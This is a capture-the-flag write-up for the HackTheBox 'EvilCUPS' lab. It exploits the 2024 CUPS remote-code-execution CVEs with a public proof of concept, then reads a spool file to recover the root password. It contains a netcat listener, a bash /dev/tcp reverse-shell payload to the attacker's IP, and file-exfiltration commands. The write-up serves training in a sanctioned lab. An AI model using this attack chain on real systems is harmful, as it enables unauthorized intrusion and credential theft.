Post

HackTheBox EvilCUPS Writeup

Posted
By x3ric
3 min read

Explore the fundamentals of cybersecurity in the EvilCUPS Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

1

10.10.11.40 evilcups.htb

Script to add hosts automatically

1
2
3

ip="10.10.11.40"
domain="evilcups.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

1

nmap -sCV evilcups.htb

1
2
3
4
5
6
7
8
9
10
11

Nmap scan report for evilcups.htb (10.10.11.40)
Host is up (0.052s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 36:49:95:03:8d:b4:4c:6e:a9:25:92:af:3c:9e:06:66 (ECDSA)
|_  256 9f:a4:a9:39:11:20:e0:96:ee:c4:9a:69:28:95:0c:60 (ED25519)
631/tcp open  ipp     CUPS 2.4
|_http-title: Bad Request - CUPS v2.4.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can access the CUPS interface at http://10.10.11.40:631.

Remote Code Execution (RCE)

This attack is described in detail here:
https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/

The proof of concept (PoC) was created by the room creator and can be found here:
https://github.com/IppSec/evil-cups

Step 1: Start a Listener

Set up a listener to capture the reverse shell:

1

nc -lvnp 9001

Step 2: Download and Set Up the Exploit

You’ll need the Python ippserver package for the CUPS exploit.

1
2
3
4

wget https://raw.githubusercontent.com/IppSec/evil-cups/refs/heads/main/evilcups.py -O evilcups
chmod +x evilcups
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
./evilcups $vpnip 10.10.11.40 'bash -c "nohup bash -i >& /dev/tcp/'$vpnip'/9001 0>&1"&'

Step 3: Trigger the RCE

To trigger the reverse shell, go to the CUPS web interface at http://10.10.11.40:631. Find the added printer, click on “Maintenance,” and then click on “Print Test Page.”

Step 4: Retrieve the User Flag

Once you have shell access, you can retrieve the user flag:

1

cat /home/htb/user.txt

Step 5: Explore CUPS Spool Files

Navigate to the CUPS spool directory to inspect the files:

1
2

cd /var/spool/cups
cat d00001-001

Set up a Python HTTP server to transfer the file:

1

python3 -m http.server

Step 6: Download and Convert the Spool File

On your local machine, download the spool file:

1

wget 'http://10.10.11.40:8000/d00001-001'

Convert the file to PDF format:

1

ps2pdf d00001-001 d00001-001.pdf

Open the PDF to inspect its contents:

1

xdg-open d00001-001.pdf

Step 7: Retrieve the Root Password

With the information gathered, SSH into the box as root:

1

ssh root@10.10.11.40

Retrieve the root flag:

1

cat /root/root.txt

Good OpSec: Removing a Malicious Printer from CUPS

1. List Active Printers

Check which printers are currently active:

1

lpstat -p

Example:

1
2

printer Canon_MB2300_series is idle.
printer HACKED_10_10_14_2 is idle.

2. Attempt Printer Removal

Try to remove the malicious printer:

1

lpadmin -x HACKED_10_10_14_2

3. Restart CUPS

Apply changes by restarting the CUPS service:

1

systemctl restart cups

4. Verify Removal

Check again to ensure the printer is removed:

1

lpstat -p

5. Manual Removal (If Necessary)

If lpadmin fails, manually edit the printer configuration:

1

nano /etc/cups/printers.conf

Delete the section for the unwanted printer:

1
2
3

<Printer HACKED_10_10_14_2>
...
</Printer>

Save and exit (Ctrl + O, Ctrl + X).

6. Clear CUPS Cache

Remove the CUPS job cache:

1

rm /var/cache/cups/job.cache

Important: Only clear spool files if you are sure there’s no sensitive data:

1

rm /var/spool/cups/d* /var/spool/cups/c*

Note: On this machine, avoid removing spool files because they contain the password.

ctf
htb cft writeup linux cups cve-2024-47176 cve-2024-47076 cve-2024-47175 cve-2024-47177
This post is licensed under CC BY 4.0 by the author.